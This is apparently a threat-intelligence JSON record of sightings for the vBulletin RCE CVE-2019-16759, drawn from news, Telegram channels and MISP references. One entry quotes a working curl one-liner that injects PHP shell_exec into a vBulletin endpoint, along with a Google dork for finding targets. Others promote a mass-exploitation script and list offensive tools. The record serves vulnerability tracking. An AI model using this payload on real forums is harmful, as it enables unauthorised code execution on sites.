{"vulnerability": "CVE-2019-16759", "sightings": [{"uuid": "6041199c-7b8a-40cc-97e7-444ede46da50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "https://t.me/ctinow/16193", "content": "Cloudflare Now Blocks the vBulletin RCE CVE-2019-16759 Exploit - by @LawrenceAbrams\nhttps://t.co/puCuVmgXIO http://twitter.com/BleepinComputer/status/1178326541148807168", "creation_timestamp": "2019-09-29T17:18:12.000000Z"}, {"uuid": "530d3dc7-23a1-41d0-a32c-73285470b307", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "exploited", "source": "https://t.me/ctinow/16088", "content": "RT @GreyNoiseIO: GreyNoise is observing opportunistic exploitation of the recent vBulletin 5.x remote code execution vulnerability (CVE-2019-16759), starting three hours ago from several hundred devices around the Internet. Tags available now. \n\ntags:", "creation_timestamp": "2019-09-25T19:40:32.000000Z"}, {"uuid": "638c1351-a2bb-4e98-a238-def0eb2dd35c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "https://t.me/Ninjutsu_os/343", "content": "WINDOWS 10 PRO 2004 [19041] X64\nVersion: 2004\nBuild: 19041.450\nEdition: Pro\nArch: x64\nLang: en-US\n\n---------------------------------------------------------\nChangelog / Updates:\n\n\u2705 26/08/2020\n\nFeatures:\n\u2705 Windows 10 Pre-Installed Penetration Testing, Red Teaming.\n\u2705 More than 800 penetration testing tools.\n\u2705 Customize Windows 10 with powerful tweak and optimize to Protect your privacy.\n\u2705 Unwanted Windows components removal.\n\u2705 Disable many of the annoying features built into windows.\n\u2705 Remove/Disable many Windows programs and services.\n\u2705 Prefills the commandline.\n\u2705 Windows Terminal Powerline in PowerShell  \n\u2705 .NET Framework (4.0/4.5/4.6/4.7/4.8/2.x/3.x)\n\u2705 Optimized WINDOWS\n\u2705 Performs privacy & security check of Windows 10\n\n\n\nRemove/Disables component:\n\u2705 Greenshot Apps\n\u2705 Vega Web Scanner\n\u2705 yogadns\n\u2705 Microsoft Edge Browser\n\u2705 Docker\n\u2705 Nox Android Emulator\n\u2705 COMODO Firewall\n\u2705 Winja\n\u2705 MarkdownEdit\n\u2705 Windows Apps and System Apps\n\u2705 Windows Security / Defender  / Smartscreen\n\u2705 OneDrive\n\u2705 Disable UAC (Never notify)\n\u2705 Internet Explorer 11\n\u2705 Media Features\n\u2705 Windows powershell v2\n\n\n### Updated Tools :\n\n# Antivirus Evasion Tools\n\u2705 Macro Pack-Automatize Obfuscation & Generation of MS Office\n\n# Exploitation Tools\n\u2705 Goby Attack surface mapping\n\u2705 Metasploit\n\n# Information Gathering\n\u2705 subfinder\n\u2705 Sublist3r\n\u2705 FinalRecon\n\u2705 findomain\n\u2705 amass\n\u2705 gitleaks\n\u2705 EyeWitness\n\u2705 Maltego\n\n# Malware Analysis\n\u2705 Detect It Easy\n\u2705 dnSpy\n\u2705 loki\n\u2705 Process Explorer\n\n# Mobile Security Tools\n\u2705 Mobile-Security-Framework-MobSF\n\n# Proxy and Privacy Tools\n\u2705 Tor Browser\n\u2705 SimpleDNSCrypt\n\u2705 WPD\n\u2705 O&O ShutUp10\n\u2705 W10Privacy\n\n# Reverse Engineering\n\u2705 x64dbg\n\u2705 dnSpy\n\n# Web Application Attack\n\u2705 WPScan-WordPress Vulnerability Scanner\n\u2705 BuprSuite \n\u2705 testssl.sh\n\u2705 commix\n\u2705 droopescan\n\u2705 sqlmap\n\u2705 nuclei\n\u2705 sslscan\n\u2705 gowitness\n\n# Wireless Attacks\n\u2705 bettercap\n\n# Utility Tools\n\u2705 chrome\n\u2705 Firefox\n\u2705 Brave\n\u2705 Sharex\n\n\n## Added Tools :\n\n# Command & Control\n\u2705 LocalXpose\n\u2705 One-Lin3r\n\u2705 UPnP PortMapper\n\n# Exploitation Tools\n\u2705 HiveJack  dump Windows credentials\n\n# Information Gathering\n\u2705 IP List Generator 2 (x64)\n\n# Malware Analysis\n\u2705 AnVir Task Manager\n\u2705 Dependency Walker\n\u2705 HijackThis\n\u2705 YARA\n\n# Mobile Security Tools\n\n# Networking Attack\n\u2705 superscan\n\u2705 sipp\n\u2705 sippts\n\u2705 SIPP -VOIP Test\n\u2705 SIPVicious suite\n\u2705 sipscan\n\u2705 nbrute\n\u2705 winbox\n\u2705 SNMPCheck SNMP enumerator\n\u2705 SIP Scanner\n\u2705 OWASP-Nettacker\n\n# Password Attacks\n\u2705 ncrack\n\n# Proxy and Privacy Tools\n\u2705 privatezilla\n\u2705 Clear All Event Logs\n\u2705 BleachBit\n\u2705 TMAC (MAC Address Changer)\n\u2705 SoftEther VPN Client Manager (Free VPN)\n\u2705 tor bundle (terminal #tor)\n\n# Reverse Engineering\n\u2705 Cutter\n\n# Vulnerability Analysis\n\n# Web Application Attack\n\u2705 WS-Attacker-1.8\n\u2705 wsdigger\n\u2705 weblogicScanner\n\u2705 CMSMap CMS vulnerability scanner\n\u2705 All-in-One OS command injection\n\u2705 WSDigger -Web Services\n\n\n# Wireless Attacks\n\u2705 CommViewforWiFi\n\n# Wordlists\n\u2705 Cheatsheet-God\n\u2705 penetration-testing-cheat-sheet\n\u2705 PentesterSpecialDict\n\n# Utility Tools\n\u2705 TCPOptimizer\n\u2705 Markdown Monster\n\u2705 ccenhancer\n\u2705 Driver Easy\n\u2705 IrfanView\n\u2705 TreeSizeFree\n\n\n# Nmpa NSE :\n\n\u2705 CVE-2020-0796_new\n\u2705 smb2-capabilities_patched\n\u2705 cve-2020-1350\n\u2705 cve-2020-0796\n\u2705 http-vuln-cve2020-3452\n\u2705 http-vuln-cve2020-5902\n\u2705 http-raw-headers\n\u2705 http-vuln-cve2017-18195\n\u2705 dlink-cve-2019-13101\n\u2705 cisco-cve-2019-1937\n\u2705 abb-cve-2019-7226\n\u2705 cve_2019_1653\n\u2705 CVE-2019-19781\n\u2705 http-vuln-CVE-2019-16759\n\u2705 weblogic-CNVD-C-2019-48814\n\u2705 smb-vuln-cve-2020-0796\n\n\n### Privacy Tweaks ###\n\u2705 Block pop-ups and annoying ads on websites (Hosts)\n\u2705 Disable Inventory  Collector\n\u2705 Disable Get Even more out of windows\n\u2705 Disable app access to notificaton , account info ,email ..etc \n\u2705 Disable Telemetry\n\u2705 Disable WiFi Sense\n\u2705 Disable SmartScreen\n\u2705 Disable WebSearch\n\u2705 Disable App Suggestions\n\u2705 Disable Activity History\n\u2705 Disable Background Apps\n\u2705 Disable Sensors\n\u2705 Disable Location\n\u2705 Disable MapUpdates\n\u2705 Disable Feedback\n\u2705 Disable Tailored Experiences\n\u2705 Disable Advertising ID\n\u2705 Disable WebLangList\n\u2705 Disable Cortana\n\u2705 Disable Error Reporting\n\u2705 Disable SetP2P", "creation_timestamp": "2020-08-27T17:04:45.000000Z"}, {"uuid": "0829b1c4-2c8c-4042-93cb-1d50c7c33f77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "https://t.me/Ninjutsu_os/134", "content": "\ud83d\udd30Ninjutsu OS Info \ud83d\udd30  \n\n\nWe added 40 Nmap Scripting Engine (NSE) to Ninjutsu OS\n\nAxis_vuln_webcam\ncisco-asa-scan\nhttp-middleware-path-finder\nCVE-2018-13379\ncisco-cve-2019-1937\nhttp-pulse_ssl_vpn\nCVE-2018-20377\ncitrix\nhttp-screenshot\nphpadmin\nCVE-2018-4407\nclickjacking-prevent-check\nhttp-shellshock\nsmb-vuln-cve-2020-0796\nCVE-2018-7600_drupalgeddon\ncve_2019_1653\nhttp-vuln-CVE-2019-16759\ntomcat-cve-2017-12615\nCVE-2019-19781\ndlink-cve-2019-13101\nhttp-vuln-cve2017-18195\ntraversal\nCVE-2020-0796\ndocker_daemontcp\nhttp-waf-test\nvxworks_urgent11\nIIS-CVE-2010-2731\nfile-checker\nhttpcs_docker-daemontcp-prod\nweblogic-CNVD-C-2019-48814\nMS15-034\nfreevu\narch\nhydra\nweblogic-cve-2018-2894\nabb-cve-2019-7226\nhttp-lfi\ninfiltrator\nwinVulnDetection", "creation_timestamp": "2020-05-12T13:27:31.000000Z"}, {"uuid": "8e15c5a8-f28f-4a45-9af8-3176f15d8edf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "https://t.me/Ninjutsu_os/739", "content": "\ud83d\udd30Ninjutsu OS Info \ud83d\udd30  \n\n\nWe added 40 Nmap Scripting Engine (NSE) to Ninjutsu OS\n\nAxis_vuln_webcam\ncisco-asa-scan\nhttp-middleware-path-finder\nCVE-2018-13379\ncisco-cve-2019-1937\nhttp-pulse_ssl_vpn\nCVE-2018-20377\ncitrix\nhttp-screenshot\nphpadmin\nCVE-2018-4407\nclickjacking-prevent-check\nhttp-shellshock\nsmb-vuln-cve-2020-0796\nCVE-2018-7600_drupalgeddon\ncve_2019_1653\nhttp-vuln-CVE-2019-16759\ntomcat-cve-2017-12615\nCVE-2019-19781\ndlink-cve-2019-13101\nhttp-vuln-cve2017-18195\ntraversal\nCVE-2020-0796\ndocker_daemontcp\nhttp-waf-test\nvxworks_urgent11\nIIS-CVE-2010-2731\nfile-checker\nhttpcs_docker-daemontcp-prod\nweblogic-CNVD-C-2019-48814\nMS15-034\nfreevu\narch\nhydra\nweblogic-cve-2018-2894\nabb-cve-2019-7226\nhttp-lfi\ninfiltrator\nwinVulnDetection", "creation_timestamp": "2020-05-12T13:27:34.000000Z"}, {"uuid": "97bfeef9-ea31-4f4f-86a7-e2244a40cdb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "https://t.me/Ninjutsu_os/6563", "content": "WINDOWS 10 PRO 2004 [19041] X64\nVersion: 2004\nBuild: 19041.450\nEdition: Pro\nArch: x64\nLang: en-US\n\n---------------------------------------------------------\nChangelog / Updates:\n\n\u2705 26/08/2020\n\nFeatures:\n\u2705 Windows 10 Pre-Installed Penetration Testing, Red Teaming.\n\u2705 More than 800 penetration testing tools.\n\u2705 Customize Windows 10 with powerful tweak and optimize to Protect your privacy.\n\u2705 Unwanted Windows components removal.\n\u2705 Disable many of the annoying features built into windows.\n\u2705 Remove/Disable many Windows programs and services.\n\u2705 Prefills the commandline.\n\u2705 Windows Terminal Powerline in PowerShell  \n\u2705 .NET Framework (4.0/4.5/4.6/4.7/4.8/2.x/3.x)\n\u2705 Optimized WINDOWS\n\u2705 Performs privacy & security check of Windows 10\n\n\n\nRemove/Disables component:\n\u2705 Greenshot Apps\n\u2705 Vega Web Scanner\n\u2705 yogadns\n\u2705 Microsoft Edge Browser\n\u2705 Docker\n\u2705 Nox Android Emulator\n\u2705 COMODO Firewall\n\u2705 Winja\n\u2705 MarkdownEdit\n\u2705 Windows Apps and System Apps\n\u2705 Windows Security / Defender  / Smartscreen\n\u2705 OneDrive\n\u2705 Disable UAC (Never notify)\n\u2705 Internet Explorer 11\n\u2705 Media Features\n\u2705 Windows powershell v2\n\n\n### Updated Tools :\n\n# Antivirus Evasion Tools\n\u2705 Macro Pack-Automatize Obfuscation & Generation of MS Office\n\n# Exploitation Tools\n\u2705 Goby Attack surface mapping\n\u2705 Metasploit\n\n# Information Gathering\n\u2705 subfinder\n\u2705 Sublist3r\n\u2705 FinalRecon\n\u2705 findomain\n\u2705 amass\n\u2705 gitleaks\n\u2705 EyeWitness\n\u2705 Maltego\n\n# Malware Analysis\n\u2705 Detect It Easy\n\u2705 dnSpy\n\u2705 loki\n\u2705 Process Explorer\n\n# Mobile Security Tools\n\u2705 Mobile-Security-Framework-MobSF\n\n# Proxy and Privacy Tools\n\u2705 Tor Browser\n\u2705 SimpleDNSCrypt\n\u2705 WPD\n\u2705 O&O ShutUp10\n\u2705 W10Privacy\n\n# Reverse Engineering\n\u2705 x64dbg\n\u2705 dnSpy\n\n# Web Application Attack\n\u2705 WPScan-WordPress Vulnerability Scanner\n\u2705 BuprSuite \n\u2705 testssl.sh\n\u2705 commix\n\u2705 droopescan\n\u2705 sqlmap\n\u2705 nuclei\n\u2705 sslscan\n\u2705 gowitness\n\n# Wireless Attacks\n\u2705 bettercap\n\n# Utility Tools\n\u2705 chrome\n\u2705 Firefox\n\u2705 Brave\n\u2705 Sharex\n\n\n## Added Tools :\n\n# Command & Control\n\u2705 LocalXpose\n\u2705 One-Lin3r\n\u2705 UPnP PortMapper\n\n# Exploitation Tools\n\u2705 HiveJack  dump Windows credentials\n\n# Information Gathering\n\u2705 IP List Generator 2 (x64)\n\n# Malware Analysis\n\u2705 AnVir Task Manager\n\u2705 Dependency Walker\n\u2705 HijackThis\n\u2705 YARA\n\n# Mobile Security Tools\n\n# Networking Attack\n\u2705 superscan\n\u2705 sipp\n\u2705 sippts\n\u2705 SIPP -VOIP Test\n\u2705 SIPVicious suite\n\u2705 sipscan\n\u2705 nbrute\n\u2705 winbox\n\u2705 SNMPCheck SNMP enumerator\n\u2705 SIP Scanner\n\u2705 OWASP-Nettacker\n\n# Password Attacks\n\u2705 ncrack\n\n# Proxy and Privacy Tools\n\u2705 privatezilla\n\u2705 Clear All Event Logs\n\u2705 BleachBit\n\u2705 TMAC (MAC Address Changer)\n\u2705 SoftEther VPN Client Manager (Free VPN)\n\u2705 tor bundle (terminal #tor)\n\n# Reverse Engineering\n\u2705 Cutter\n\n# Vulnerability Analysis\n\n# Web Application Attack\n\u2705 WS-Attacker-1.8\n\u2705 wsdigger\n\u2705 weblogicScanner\n\u2705 CMSMap CMS vulnerability scanner\n\u2705 All-in-One OS command injection\n\u2705 WSDigger -Web Services\n\n\n# Wireless Attacks\n\u2705 CommViewforWiFi\n\n# Wordlists\n\u2705 Cheatsheet-God\n\u2705 penetration-testing-cheat-sheet\n\u2705 PentesterSpecialDict\n\n# Utility Tools\n\u2705 TCPOptimizer\n\u2705 Markdown Monster\n\u2705 ccenhancer\n\u2705 Driver Easy\n\u2705 IrfanView\n\u2705 TreeSizeFree\n\n\n# Nmpa NSE :\n\n\u2705 CVE-2020-0796_new\n\u2705 smb2-capabilities_patched\n\u2705 cve-2020-1350\n\u2705 cve-2020-0796\n\u2705 http-vuln-cve2020-3452\n\u2705 http-vuln-cve2020-5902\n\u2705 http-raw-headers\n\u2705 http-vuln-cve2017-18195\n\u2705 dlink-cve-2019-13101\n\u2705 cisco-cve-2019-1937\n\u2705 abb-cve-2019-7226\n\u2705 cve_2019_1653\n\u2705 CVE-2019-19781\n\u2705 http-vuln-CVE-2019-16759\n\u2705 weblogic-CNVD-C-2019-48814\n\u2705 smb-vuln-cve-2020-0796\n\n\n### Privacy Tweaks ###\n\u2705 Block pop-ups and annoying ads on websites (Hosts)\n\u2705 Disable Inventory  Collector\n\u2705 Disable Get Even more out of windows\n\u2705 Disable app access to notificaton , account info ,email ..etc \n\u2705 Disable Telemetry\n\u2705 Disable WiFi Sense\n\u2705 Disable SmartScreen\n\u2705 Disable WebSearch\n\u2705 Disable App Suggestions\n\u2705 Disable Activity History\n\u2705 Disable Background Apps\n\u2705 Disable Sensors\n\u2705 Disable Location\n\u2705 Disable MapUpdates\n\u2705 Disable Feedback\n\u2705 Disable Tailored Experiences\n\u2705 Disable Advertising ID\n\u2705 Disable WebLangList\n\u2705 Disable Cortana\n\u2705 Disable Error Reporting\n\u2705 Disable SetP2P", "creation_timestamp": "2020-08-27T17:04:45.000000Z"}, {"uuid": "7af563de-7123-44c5-8ff8-5178d1875f4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "published-proof-of-concept", "source": "https://t.me/pwnwiki_zhchannel/172", "content": "CVE-2019-16759 vBulletin 5.x RCE\u6f0f\u6d1e\nhttps://www.pwnwiki.org/index.php?title=CVE-2019-16759_vBulletin_5.x_RCE%E6%BC%8F%E6%B4%9E", "creation_timestamp": "2021-09-21T06:42:48.000000Z"}, {"uuid": "595eee63-905f-48ac-b484-7a6c01b511f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "https://t.me/cibsecurity/15753", "content": "\u203c CVE-2020-7373 \u203c\n\nvBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. ALSO NOTE: CVE-2020-7373 is a duplicate of CVE-2020-17496. CVE-2020-17496 is the preferred CVE ID to track this vulnerability.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-11-01T13:37:36.000000Z"}, {"uuid": "4fe78bbd-198b-42d9-995c-a83751725450", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2021-11-20T09:53:52.000000Z"}, {"uuid": "0430c2bb-e85f-46e5-817a-259b2a0ee668", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/vbulletin_widgetconfig_rce.rb", "content": "", "creation_timestamp": "2019-12-10T18:21:21.000000Z"}, {"uuid": "9aecf5ae-8c93-4acd-aeec-4a91caf0414c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:14.000000Z"}, {"uuid": "42ca6eed-bcd4-4562-a53f-c430a499230c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/kriittinen-haavoittuvuus-vbulletinssa", "content": "", "creation_timestamp": "2026-03-17T14:50:23.600061Z"}, {"uuid": "3dbd9cd1-2a6f-41ad-86ac-5b5f01c563f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/kriittinen-haavoittuvuus-vbulletinssa", "content": "", "creation_timestamp": "2020-08-12T08:05:21.000000Z"}, {"uuid": "863f9c70-5791-44d3-8692-74f2be63c25a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/7008e941-7eb2-4bcd-a503-6c26613763ca", "content": "", "creation_timestamp": "2026-02-02T12:29:05.989885Z"}, {"uuid": "07588994-eb35-4015-ad36-2856c79943c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "published-proof-of-concept", "source": "https://t.me/cKure/1779", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 One-liner RCE: vBulletin 5xx fixes ridiculously easy to exploit zero-day RCE bug. This is bypass for CVE-2019-16759.\n\nExploit code PoC: curl -s\n http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec(\"id\"); exit;'\n\nGoogle dork:\nintext:\"Powered by vBulletin\"\n\nhttps://www.bleepingcomputer.com/news/security/vbulletin-fixes-ridiculously-easy-to-exploit-zero-day-rce-bug/\n\nhttps://mobile.twitter.com/h4x0r_dz/status/1292759555034828800", "creation_timestamp": "2020-08-11T07:24:44.000000Z"}, {"uuid": "83c7f516-39cc-48ed-bcee-4a38af1351a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "https://t.me/arpsyndicate/1072", "content": "#ExploitObserverAlert\n\nCVE-2019-16759\n\nDESCRIPTION: Exploit Observer has 62 entries related to CVE-2019-16759. vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.\n\nFIRST-EPSS: 0.975340000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-04T00:45:32.000000Z"}, {"uuid": "255aa3fe-da5c-44da-8e71-6fdca4a9db7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "published-proof-of-concept", "source": "Telegram/VSjicnoG-CEZwcognfbJhTYIiQ-V80hxLQvkE9wIxeEo3a8", "content": "", "creation_timestamp": "2019-11-20T09:49:43.000000Z"}, {"uuid": "4de79d18-5695-4504-8088-0ab308e12ec8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "published-proof-of-concept", "source": "Telegram/ABcLcA87KWWUtV3OtZKEOs83LIBDnc64FGQfGz1Ag8lX", "content": "", "creation_timestamp": "2019-09-29T11:44:23.000000Z"}, {"uuid": "bd9293c5-36de-48e8-a144-7c82c7f448e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "Telegram/fxjm_tInZkQLAdwM6Dcx3foeFVV8zXK3fwdIT1xxThWfbRk", "content": "", "creation_timestamp": "2019-11-06T09:32:30.000000Z"}, {"uuid": "b92358c4-546a-4cc1-a9e9-3bdc8b810188", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "published-proof-of-concept", "source": "https://t.me/thehackernews/802", "content": "\ud83d\udd25 Watch Out! A new critical vBulletin zero-day RCE vulnerability and its PoC exploits have been publicly disclosed, allowing attackers to bypass patch for an old RCE bug (CVE-2019-16759) and remotely compromise sites.\n\nDetails \u2014 https://thehackernews.com/2020/08/vBulletin-vulnerability-exploit.html", "creation_timestamp": "2020-08-11T15:52:18.000000Z"}, {"uuid": "69e42cf5-0250-45dc-ba50-213b208f0ffe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "exploited", "source": "https://t.me/DC8044_Info/392", "content": "\u0421\u043a\u0440\u0438\u043f\u0442 \u0434\u043b\u044f \u0431\u044b\u0441\u0442\u0440\u043e\u0433\u043e \u043f\u043e\u0438\u0441\u043a\u0430 \u0444\u043e\u0440\u0443\u043c\u043e\u0432 \u043d\u0430 \u0412\u0431\u044e\u043b\u0435\u0442\u043d\u0435, \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043a \u0442\u043e\u0439 \u0441\u0430\u043c\u043e\u0439 \u0432\u0443\u043b\u044c\u043d\u0435 (CVE-2019-16759). \u041d\u0430\u043b\u0435\u0442\u0430\u0439, \u043d\u0430\u0433\u0438\u0431\u0430\u0439, \u0433\u0440\u0430\u0431\u044c, ...\u0433\u0443\u0441\u0435\u0439, \u0436\u0434\u0438 \u043e\u0442\u0432\u0435\u0442\u043d\u043e\u0433\u043e \u0433\u0443\u0434\u043a\u0430 : )\nhttps://github.com/Frint0/mass-pwn-vbulletin/blob/master/README.md", "creation_timestamp": "2019-09-26T10:15:11.000000Z"}, {"uuid": "25ec6e6d-50fe-4945-a908-36f5fb890da5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "MISP/5da7530b-2740-407f-92ae-42a973e10023", "content": "", "creation_timestamp": "2019-10-16T17:29:43.000000Z"}, {"uuid": "114cc0e0-74d9-4bdf-8e95-a7cb8ae97a26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "MISP/b14f5ca4-fb33-4da3-ad29-dcaf9e3d3fc4", "content": "", "creation_timestamp": "2020-10-09T13:24:39.000000Z"}, {"uuid": "412e18c2-7203-4cb7-80d7-4c22be78363b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "MISP/f5030aca-7d5a-43a4-ae03-8f4ac8e85422", "content": "", "creation_timestamp": "2021-11-08T08:58:20.000000Z"}, {"uuid": "b64403fb-fa2e-40e0-b7e6-772ac005aa8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2970901", "content": "", "creation_timestamp": "2024-12-24T20:21:29.074493Z"}, {"uuid": "3f9df010-d9fc-4631-9802-f705c2be0f3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2970902", "content": "", "creation_timestamp": "2024-12-24T20:21:29.933861Z"}, {"uuid": "35136bc8-ecaf-4c03-a576-1b408e728fa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:44.000000Z"}, {"uuid": "0cd4a085-8d38-4ac5-87e7-108f15517bf0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:09:42.000000Z"}, {"uuid": "b2146f93-10e4-472a-ae49-07d9a583a905", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/7008e941-7eb2-4bcd-a503-6c26613763ca", "content": "", "creation_timestamp": "2026-02-02T12:29:05.989885Z"}, {"uuid": "c32902d7-ce27-44cb-ab80-7efaa12b4bdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "published-proof-of-concept", "source": "https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/vbulletin/cve201916759", "content": "", "creation_timestamp": "2021-02-05T21:43:47.000000Z"}, {"uuid": "e24c98db-be61-4ca9-98d6-c4899fd30d64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-16759", "type": "exploited", "source": "https://t.me/BleepingComputer/5962", "content": "Cloudflare Now Blocks the vBulletin RCE CVE-2019-16759 Exploit\n\nThis week a zero-day vBulletin\u00a0remote code execution vulnerability and exploit was publicly disclosed and is being used by bad actors to attack vBulletin forums. Cloudflare has now created a special rule that will prevent this exploit from working on vBulletin sites behind Cloudflare's service. [...]\n\nhttps://www.bleepingcomputer.com/news/security/cloudflare-now-blocks-the-vbulletin-rce-cve-2019-16759-exploit/", "creation_timestamp": "2019-09-29T15:18:10.000000Z"}]}